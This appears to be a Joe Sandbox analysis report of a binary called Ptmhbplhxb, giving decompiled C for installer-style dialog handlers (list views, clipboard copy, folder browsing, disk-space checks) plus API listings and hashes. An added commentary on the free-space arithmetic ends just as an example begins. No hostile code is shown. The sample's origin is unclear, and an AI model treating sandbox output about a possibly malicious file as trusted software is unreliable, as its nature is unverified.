                								 *0x42f480 = _t282;
                							}
                							if(_a8 != 0x40f) {
                								L88:
                								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
                									_t307 = (0 | _a16 == 0x00000020) << 3;
                									ShowWindow(_v8, _t307);
                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                								}
                								goto L91;
                							} else {
                								E004011EF(_t285, _t282, _t282);
                								_t192 = _a12;
                								if(_t192 != _t282) {
                									if(_t192 != 0xffffffff) {
                										_t192 = _t192 - 1;
                									}
                									_push(_t192);
                									_push(8);
                									E004049D7();
                								}
                								if(_a16 == _t282) {
                									L75:
                									E004011EF(_t285, _t282, _t282);
                									_v32 =  *0x42a868;
                									_t195 =  *0x42f448;
                									_v60 = 0xf030;
                									_v20 = _t282;
                									if( *0x42f44c <= _t282) {
                										L86:
                										InvalidateRect(_v8, _t282, 1);
                										_t197 =  *0x42ebdc; // 0x84bb3a
                										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                											E00404912(0x3ff, 0xfffffffb, E0040492A(5));
                										}
                										goto L88;
                									}
                									_t308 = _t195 + 8;
                									do {
                										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                										if(_t201 != _t282) {
                											_t287 =  *_t308;
                											_v68 = _t201;
                											_v72 = 8;
                											if((_t287 & 0x00000001) != 0) {
                												_v72 = 9;
                												_v56 =  &(_t308[4]);
                												_t308[0] = _t308[0] & 0x000000fe;
                											}
                											if((_t287 & 0x00000040) == 0) {
                												_t205 = (_t287 & 0x00000001) + 1;
                												if((_t287 & 0x00000010) != 0) {
                													_t205 = _t205 + 3;
                												}
                											} else {
                												_t205 = 3;
                											}
                											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                											SendMessageA(_v8, 0x110d, _t282,  &_v72);
                										}
                										_v20 = _v20 + 1;
                										_t308 =  &(_t308[0x106]);
                									} while (_v20 <  *0x42f44c);
                									goto L86;
                								} else {
                									_t309 = E004012E2( *0x42a868);
                									E00401299(_t309);
                									_t216 = 0;
                									_t285 = 0;
                									if(_t309 <= _t282) {
                										L74:
                										SendMessageA(_v12, 0x14e, _t285, _t282);
                										_a16 = _t309;
                										_a8 = 0x420;
                										goto L75;
                									} else {
                										goto L71;
                									}
                									do {
                										L71:
                										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                											_t285 = _t285 + 1;
                										}
                										_t216 = _t216 + 1;
                									} while (_t216 < _t309);
                									goto L74;
                								}
                							}
                						}
                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                							goto L91;
                						} else {
                							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                							if(_t226 == 0xffffffff) {
                								goto L91;
                							}
                							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                								_t310 = 0x20;
                							}
                							E00401299(_t310);
                							SendMessageA(_a4, 0x420, _t282, _t310);
                							_a12 = _a12 | 0xffffffff;
                							_a16 = _t282;
                							_a8 = 0x40f;
                							goto L56;
                						}
                					}
                				} else {
                					_v32 = 0;
                					_v16 = 2;
                					 *0x42f480 = _t306;
                					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
                					_t252 = LoadBitmapA( *0x42f400, 0x6e);
                					 *0x42a85c =  *0x42a85c | 0xffffffff;
                					_t313 = _t252;
                					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E00405000);
                					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                					 *0x42a854 = _t254;
                					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                						SendMessageA(_v8, 0x111b, 0x10, 0);
                					}
                					DeleteObject(_t313);
                					_t314 = 0;
                					do {
                						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                							if(_t314 != 0x20) {
                								_v16 = _t282;
                							}
                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F87(_t282, _t314, _t318, _t282, _t260)), _t314);
                						}
                						_t314 = _t314 + 1;
                					} while (_t314 < 0x21);
                					_t315 = _a16;
                					_t283 = _v16;
                					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                					_push(0x15);
                					E00404026(_a4);
                					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                					_push(0x16);
                					E00404026(_a4);
                					_t316 = 0;
                					_t284 = 0;
                					if( *0x42f44c <= 0) {
                						L19:
                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t302 = _v20 + 8;
                						_v28 = _t302;
                						do {
                							_t270 =  &(_t302[0x10]);
                							if( *_t270 != 0) {
                								_v60 = _t270;
                								_t271 =  *_t302;
                								_t294 = 0x20;
                								_v84 = _t284;
                								_v80 = 0xffff0002;
                								_v76 = 0xd;
                								_v64 = _t294;
                								_v40 = _t316;
                								_v68 = _t271 & _t294;
                								if((_t271 & 0x00000002) == 0) {
                									if((_t271 & 0x00000004) == 0) {
                										 *( *0x42a868 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									} else {
                										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                									}
                								} else {
                									_v76 = 0x4d;
                									_v44 = 1;
                									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									_v32 = 1;
                									 *( *0x42a868 + _t316 * 4) = _t276;
                									_t284 =  *( *0x42a868 + _t316 * 4);
                								}
                							}
                							_t316 = _t316 + 1;
                							_t302 =  &(_v28[0x418]);
                							_v28 = _t302;
                						} while (_t316 <  *0x42f44c);
                						if(_v32 != 0) {
                							L20:
                							if(_v16 != 0) {
                								E0040405B(_v8);
                								_t282 = 0;
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E0040405B(_v12);
                								L91:
                								return E0040408D(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}

                APIs
                • GetDlgItem.USER32 ref: 00404A21
                • GetDlgItem.USER32 ref: 00404A2C
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
                • LoadBitmapA.USER32 ref: 00404A89
                • SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
                • DeleteObject.GDI32(00000000), ref: 00404AFF
                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
                • GetWindowLongA.USER32 ref: 00404C39
                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
                • ShowWindow.USER32(?,00000005), ref: 00404C58
                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
                • ImageList_Destroy.COMCTL32(?), ref: 00404E28
                • GlobalFree.KERNEL32 ref: 00404E38
                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
                • ShowWindow.USER32(?,00000000), ref: 00404FD7
                • GetDlgItem.USER32 ref: 00404FE2
                • ShowWindow.USER32(00000000), ref: 00404FE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
                • Opcode Fuzzy Hash: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
                • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E004051CA(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				struct tagRECT _v24;
                				void* _v32;
                				signed int _v36;
                				int _v40;
                				int _v44;
                				signed int _v48;
                				int _v52;
                				void* _v56;
                				void* _v64;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t87;
                				struct HWND__* _t89;
                				long _t90;
                				int _t95;
                				int _t96;
                				long _t99;
                				void* _t102;
                				intOrPtr _t124;
                				struct HWND__* _t128;
                				int _t150;
                				int _t153;
                				long _t157;
                				struct HWND__* _t161;
                				struct HMENU__* _t163;
                				long _t165;
                				void* _t166;
                				char* _t167;
                				char* _t168;
                				int _t169;
                
                				_t87 =  *0x42ebe4; // 0x0
                				_t157 = _a8;
                				_t150 = 0;
                				_v8 = _t87;
                				if(_t157 != 0x110) {
                					__eflags = _t157 - 0x405;
                					if(_t157 == 0x405) { // 0x405 = WM_USER+5, application-defined notification
                						CloseHandle(CreateThread(0, 0, E0040515E, GetDlgItem(_a4, 0x3ec), 0,  &_a8)); // worker thread receives the progress-bar control (item 0x3ec); the thread handle is dropped at once
                					}
                					__eflags = _t157 - 0x111;
                					if(_t157 != 0x111) { // 0x111 = WM_COMMAND
                						L17:
                						__eflags = _t157 - 0x404;
                						if(_t157 != 0x404) { // 0x404 = WM_USER+4, application-defined
                							L25:
                							__eflags = _t157 - 0x7b;
                							if(_t157 != 0x7b) { // 0x7b = WM_CONTEXTMENU
                								goto L20;
                							}
                							_t89 = _v8;
                							__eflags = _a12 - _t89;
                							if(_a12 != _t89) {
                								goto L20;
                							}
                							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150); // LVM_GETITEMCOUNT
                							__eflags = _t90 - _t150;
                							_a12 = _t90;
                							if(_t90 <= _t150) {
                								L36:
                								return 0;
                							}
                							_t163 = CreatePopupMenu();
                							AppendMenuA(_t163, _t150, 1, E00405F87(_t150, _t157, _t163, _t150, 0xffffffe1)); // single item with ID 1; caption produced by the string helper E00405F87
                							_t95 = _a16;
                							__eflags = _a16 - 0xffffffff;
                							_t153 = _a16 >> 0x10;
                							if(_a16 == 0xffffffff) {
                								GetWindowRect(_v8,  &_v24);
                								_t95 = _v24.left;
                								_t153 = _v24.top;
                							}
                							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150); // 0x180 = TPM_NONOTIFY | TPM_RETURNCMD: the chosen item ID is returned instead of posted
                							__eflags = _t96 - 1;
                							if(_t96 == 1) { // item 1 chosen: copy every row of the list view to the clipboard
                								_t165 = 1;
                								__eflags = 1;
                								_v56 = _t150;    // LVITEM.iSubItem = 0
                								_v44 = 0x42a870; // LVITEM.pszText -> static scratch buffer
                								_v40 = 0x1000;   // LVITEM.cchTextMax
                								_a4 = _a12;
                								do { // pass 1: total size = 1 + sum over rows of (text length + 2) for the CR LF after each row
                									_a4 = _a4 - 1;
                									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64); // LVM_GETITEMTEXTA; returns the text length
                									__eflags = _a4 - _t150;
                									_t165 = _t165 + _t99 + 2;
                								} while (_a4 != _t150);
                								OpenClipboard(_t150);
                								EmptyClipboard();
                								_t102 = GlobalAlloc(0x42, _t165); // GMEM_MOVEABLE | GMEM_ZEROINIT; the zero fill supplies the terminating NUL
                								_a4 = _t102;
                								_t166 = GlobalLock(_t102);
                								do { // pass 2: each row is written straight into the global block (pszText advanced per row), then CR LF
                									_v44 = _t166;
                									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                									 *_t167 = 0xd;
                									_t168 = _t167 + 1;
                									 *_t168 = 0xa;
                									_t166 = _t168 + 1;
                									_t150 = _t150 + 1;
                									__eflags = _t150 - _a12;
                								} while (_t150 < _a12);
                								GlobalUnlock(_a4);
                								SetClipboardData(1, _a4); // CF_TEXT; the clipboard takes ownership of the global block
                								CloseClipboard();
                							}
                							goto L36;
                						}
                						__eflags =  *0x42ebcc - _t150; // 0x1
                						if(__eflags == 0) {
                							ShowWindow( *0x42f408, 8); // SW_SHOWNA
                							__eflags =  *0x42f4ac - _t150;
                							if( *0x42f4ac == _t150) {
                								E0040508C( *((intOrPtr*)( *0x42a048 + 0x34)), _t150);
                							}
                							E00403FFF(1);
                							goto L25;
                						}
                						 *0x429c40 = 2;
                						E00403FFF(0x78);
                						goto L20;
                					} else {
                						__eflags = _a12 - 0x403;
                						if(_a12 != 0x403) {
                							L20:
                							return E0040408D(_t157, _a12, _a16);
                						}
                						ShowWindow( *0x42ebd0, _t150);
                						ShowWindow(_v8, 8);
                						E0040405B(_v8);
                						goto L17;
                					}
                				}
                				_v48 = _v48 | 0xffffffff;
                				_v36 = _v36 | 0xffffffff;
                				_t169 = 2;
                				_v56 = _t169; // LVCOLUMN.mask = LVCF_WIDTH; _t169 is reused below as SM_CXVSCROLL
                				_v52 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t124 =  *0x42f414;
                				_a12 =  *((intOrPtr*)(_t124 + 0x5c)); // two colour values from a global settings block;
                				_a8 =  *((intOrPtr*)(_t124 + 0x60));  // -1 keeps the list-view defaults (see the >= 0 checks below)
                				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
                				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
                				_t128 = GetDlgItem(_a4, 0x3f8);
                				 *0x42ebe4 = _t128;
                				_v8 = _t128;
                				E0040405B( *0x42ebd0);
                				 *0x42ebd4 = E0040492A(4);
                				 *0x42ebec = 0;
                				GetClientRect(_v8,  &_v24);
                				_v48 = _v24.right - GetSystemMetrics(_t169); // LVCOLUMN.cx = client width minus SM_CXVSCROLL
                				SendMessageA(_v8, 0x101b, 0,  &_v56); // LVM_INSERTCOLUMNA
                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // LVM_SETEXTENDEDLISTVIEWSTYLE, LVS_EX_LABELTIP
                				if(_a12 >= 0) {
                					SendMessageA(_v8, 0x1001, 0, _a12); // LVM_SETBKCOLOR
                					SendMessageA(_v8, 0x1026, 0, _a12); // LVM_SETTEXTBKCOLOR
                				}
                				if(_a8 >= _t150) {
                					SendMessageA(_v8, 0x1024, _t150, _a8); // LVM_SETTEXTCOLOR
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E00404026(_a4);
                				if(( *0x42f41c & 0x00000003) != 0) {
                					ShowWindow( *0x42ebd0, _t150);
                					if(( *0x42f41c & 0x00000002) != 0) {
                						 *0x42ebd0 = _t150;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E0040405B( *0x42ebc8);
                				}
                				_t161 = GetDlgItem(_a4, 0x3ec); // progress bar
                				SendMessageA(_t161, 0x401, _t150, 0x75300000); // PBM_SETRANGE, MAKELPARAM(0, 30000)
                				if(( *0x42f41c & 0x00000004) != 0) {
                					SendMessageA(_t161, 0x409, _t150, _a8); // PBM_SETBARCOLOR
                					SendMessageA(_t161, 0x2001, _t150, _a12); // CCM_SETBKCOLOR (PBM_SETBKCOLOR)
                				}
                				goto L36;
                			}
                Instruction address column for the listing above (one address per decompiled line, spilled out of the side-by-side layout): 0x004051d0 to 0x0040554b

                APIs
                • GetDlgItem.USER32 ref: 00405229
                • GetDlgItem.USER32 ref: 00405238
                • GetClientRect.USER32 ref: 00405275
                • GetSystemMetrics.USER32 ref: 0040527C
                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
                • ShowWindow.USER32(?,00000008), ref: 00405318
                • GetDlgItem.USER32 ref: 00405339
                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
                • GetDlgItem.USER32 ref: 00405247
                  • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
                • GetDlgItem.USER32 ref: 0040538A
                • CreateThread.KERNEL32 ref: 00405398
                • CloseHandle.KERNEL32(00000000), ref: 0040539F
                • ShowWindow.USER32(00000000), ref: 004053C2
                • ShowWindow.USER32(?,00000008), ref: 004053C9
                • ShowWindow.USER32(00000008), ref: 0040540F
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
                • CreatePopupMenu.USER32 ref: 00405454
                • AppendMenuA.USER32 ref: 00405469
                • GetWindowRect.USER32 ref: 00405489
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
                • OpenClipboard.USER32(00000000), ref: 004054EE
                • EmptyClipboard.USER32 ref: 004054F4
                • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
                • GlobalLock.KERNEL32 ref: 00405507
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
                • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                • SetClipboardData.USER32 ref: 0040553F
                • CloseClipboard.USER32 ref: 00405545
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID:
                • API String ID: 590372296-0
                • Opcode ID: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                • Opcode Fuzzy Hash: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00404496(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed int _v12;
                				long _v16;
                				long _v20;
                				long _v24;
                				char _v28;
                				intOrPtr _v32;
                				long _v36;
                				char _v40;
                				unsigned int _v44;
                				signed int _v48;
                				CHAR* _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				CHAR* _v72;
                				void _v76;
                				struct HWND__* _v80;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t82;
                				long _t87;
                				signed char* _t89;
                				void* _t95;
                				signed int _t96;
                				int _t109;
                				signed char _t114;
                				signed int _t118;
                				struct HWND__** _t122;
                				intOrPtr* _t138;
                				CHAR* _t146;
                				intOrPtr _t147;
                				unsigned int _t150;
                				signed int _t152;
                				unsigned int _t156;
                				signed int _t158;
                				signed int* _t159;
                				signed char* _t160;
                				struct HWND__* _t165;
                				struct HWND__* _t166;
                				int _t168;
                				unsigned int _t197;
                
                				_t156 = __edx;
                				_t82 =  *0x42a048;
                				_v32 = _t82;
                				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000; // directory text buffer: 0x430000 + (index << 10), i.e. 1 KiB slots
                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                				if(_a8 == 0x40b) { // 0x40b = WM_USER+0xb, application-defined
                					E00405665(0x3fb, _t146); // GetDlgItemTextA (per the subcall list): read item 0x3fb into the buffer
                					E004061CF(_t146); // path clean-up via CharNextA/CharPrevA against the character set *?|<>/": (per the subcall list)
                				}
                				_t166 = _a4;
                				if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
                					L8:
                					if(_a8 != 0x111) { // 0x111 = WM_COMMAND
                						L20:
                						if(_a8 == 0x40f) { // 0x40f = WM_USER+0xf: recompute the free-space figure for the chosen directory
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							E00405665(0x3fb, _t146);
                							if(E004059EB(_t185, _t146) == 0) {
                								_v8 = 1;
                							}
                							E00405F65(0x429840, _t146);
                							_t87 = E004062FD(1); // dynamically resolved import (index 1); used through _v16 below
                							_v16 = _t87;
                							if(_t87 == 0) { // not available: fall back to GetDiskFreeSpaceA
                								L30:
                								E00405F65(0x429840, _t146);
                								_t89 = E00405996(0x429840);
                								_t158 = 0;
                								if(_t89 != 0) {
                									 *_t89 =  *_t89 & 0x00000000;
                								}
                								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) { // out: sectors per cluster, bytes per sector, free clusters, total clusters
                									goto L35;
                								} else {
                									_t168 = 0x400;
                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400); // free KiB = bytes per cluster * free clusters / 1024; 32-bit result, -1 on overflow
                									asm("cdq"); // sign-extend eax into edx
                									_v48 = _t109; // low dword of free KiB
                									_v44 = _t156; // high dword: 0, or -1 after a MulDiv overflow
                									_v12 = 1;
                									goto L36;
                								}
                							} else {
                								_t159 = 0;
                								if(0 == 0x429840) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40); // call through the resolved pointer; (path, three 64-bit out values) is the GetDiskFreeSpaceExA shape, inferred from usage
                									if(_t114 != 0) {
                										break;
                									}
                									if(_t159 != 0) {
                										 *_t159 =  *_t159 & _t114;
                									}
                									_t160 = E00405944(0x429840); // position just past the last '\\' (inferred from the loop below)
                									 *_t160 =  *_t160 & 0x00000000; // cut the last path component
                									_t159 = _t160 - 1;
                									 *_t159 = 0x5c; // keep the trailing '\\' and retry on the parent directory until the buffer start is reached
                									if(_t159 != 0x429840) {
                										continue;
                									} else {
                										goto L30;
                									}
                								}
                								_t150 = _v44;
                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa; // 64-bit byte count >> 10: low dword of free KiB
                								_v44 = _t150 >> 0xa; // high dword of free KiB
                								_v12 = 1;
                								_t158 = 0;
                								__eflags = 0;
                								L35:
                								_t168 = 0x400;
                								L36:
                								_t95 = E0040492A(5);
                								if(_v12 != _t158) {
                									_t197 = _v44;
                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) { // short of space when the high dword is negative, or zero with the low dword below the value E0040492A(5) returned
                										_v8 = 2;
                									}
                								}
                								_t147 =  *0x42ebdc; // 0x84bb3a
                								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                									E00404912(0x3ff, 0xfffffffb, _t95);
                									if(_v12 == _t158) {
                										SetDlgItemTextA(_a4, _t168, 0x429830);
                									} else {
                										E0040484D(_t168, 0xfffffffc, _v48, _v44);
                									}
                								}
                								_t96 = _v8;
                								 *0x42f4c4 = _t96;
                								if(_t96 == _t158) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v32 + 0x14) & _t168) != 0) {
                									_v8 = _t158;
                								}
                								E00404048(0 | _v8 == _t158);
                								if(_v8 == _t158 &&  *0x42a860 == _t158) {
                									E004043EF();
                								}
                								 *0x42a860 = _t158;
                								goto L53;
                							}
                						}
                						_t185 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L53;
                						}
                						goto L22;
                					}
                					_t118 = _a12 & 0x0000ffff;
                					if(_t118 != 0x3fb) {
                						L12:
                						if(_t118 == 0x3e9) {
                							_t152 = 7;
                							memset( &_v76, 0, _t152 << 2); // BROWSEINFOA: zero the seven fields after hwndOwner
                							_v80 = _t166; // hwndOwner
                							_v72 = 0x42a870; // pszDisplayName -> static scratch buffer
                							_v60 = E004047E7; // lpfn: browse callback
                							_v56 = _t146; // lParam: current directory buffer
                							_v68 = E00405F87(_t146, 0x42a870, _t166, 0x429c48, _v12); // lpszTitle from the string helper
                							_t122 =  &_v80;
                							_v64 = 0x41; // ulFlags = BIF_RETURNONLYFSDIRS | BIF_NEWDIALOGSTYLE
                							__imp__SHBrowseForFolderA(_t122);
                							if(_t122 == 0) { // no PIDL: dialog cancelled, just refresh the free-space figure
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t122); // release the returned PIDL
                								E004058FD(_t146);
                								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
                								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == 0x435400) {
                									E00405F87(_t146, 0x42a870, _t166, 0, _t125);
                									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
                										lstrcatA(_t146, 0x42e3a0);
                									}
                								}
                								 *0x42a860 =  *0x42a860 + 1;
                								SetDlgItemTextA(_t166, 0x3fb, _t146);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) { // notification code in HIWORD(wParam); 0x300 = EN_CHANGE
                						goto L53;
                					}
                					_a8 = 0x40f; // the directory edit changed: treat as a free-space refresh
                					goto L12;
                				} else {
                					_t165 = GetDlgItem(_t166, 0x3fb); // directory edit control
                					if(E0040596A(_t146) != 0 && E00405996(_t146) == 0) {
                						E004058FD(_t146);
                					}
                					 *0x42ebd8 = _t166;
                					SetWindowTextA(_t165, _t146);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E00404026(_t166);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E00404026(_t166);
                					E0040405B(_t165);
                					_t138 = E004062FD(7); // dynamically resolved import (index 7)
                					if(_t138 == 0) {
                						L53:
                						return E0040408D(_a8, _a12, _a16);
                					} else {
                						 *_t138(_t165, 1); // called with the edit control and 1; matches SHAutoComplete(hwnd, SHACF_FILESYSTEM), inferred from the arguments
                						goto L8;
                					}
                				}
                			}
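                The free-space logic in E00404496 above is the part of this handler worth re-running by hand: the resolved 64-bit call is tried first, walking up the path until it succeeds, and only then does the code fall back to GetDiskFreeSpaceA plus a 32-bit MulDiv whose result is sign-extended with cdq (the dialog as a whole is consistent with an installer stub's directory page, an inference from the strings and API mix rather than something the report states). The C below is an added example, not code from the report or from the sample: it models both branches and the "enough space" test in portable C so the overflow edge case can be observed without Win32. The function names, the MulDiv stand-in and the unsigned low-dword compare are assumptions.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Added example (not from the sandbox report or the sample). Models the
 * free-disk-space arithmetic of the decompiled handler E00404496:
 *   - the 64-bit branch (resolved pointer, GetDiskFreeSpaceExA-style output)
 *   - the GetDiskFreeSpaceA + MulDiv fallback with its cdq sign extension
 *   - the "insufficient space" test that follows both branches.
 * Names and the MulDiv stand-in are assumptions. */

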